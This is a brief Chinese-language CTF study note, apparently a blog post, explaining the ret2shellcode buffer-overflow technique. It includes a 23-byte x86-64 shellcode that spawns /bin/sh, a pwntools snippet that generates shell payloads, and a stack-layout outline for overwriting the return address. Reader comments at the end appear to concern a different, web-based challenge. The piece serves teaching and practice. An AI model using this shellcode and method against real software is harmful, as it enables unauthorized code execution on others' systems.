PWN-ret2shellcode原理
我们之前做过很简单的pwn题目
buuctf-rip这种 是在程序中存在shellcode 直接返回地址改为这个shellcode的地址即可
但是如果程序里面没有呢
这种类型就是ret2shellcode
常见的shellcode
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
这个shellcode只有23字节 是可以在能输入字节有限的地方进行使用
如果输入的字节可以存储特别大的话 我们可以使用pwntools的函数生成
from pwn import *
context.arch='amd64' #64位需要使用这个 32不用加
shellcode=asm(shellcraft.sh())
这是我理解的retshellcode的栈中的图
1.写入垃圾字符覆盖输入函数的变量和ebp
2.写入shellcode的地址 把返回地址覆盖掉 实现返回到shellcode的地址中
3.写入shellcode
这篇只是最简单的自我认识原理
例题
双层小牛堡: hackbar自动给你配置好了我们只需要传递值,它自己会加上
2401_84410993: w25传cookie值直接传数字吗?不需要传token=数字 吗?
a3418645549: 大佬当位列太庙
luv—: 这里的-1是为什么呀
普通网友: 大佬的文章写的太精辟了 让我深刻了解了这篇文章的精髓 谢谢大佬分享,希望继续创作优质博文。【我也写了一些相关领域的文章,希望能够得到博主的指导,共同进步!】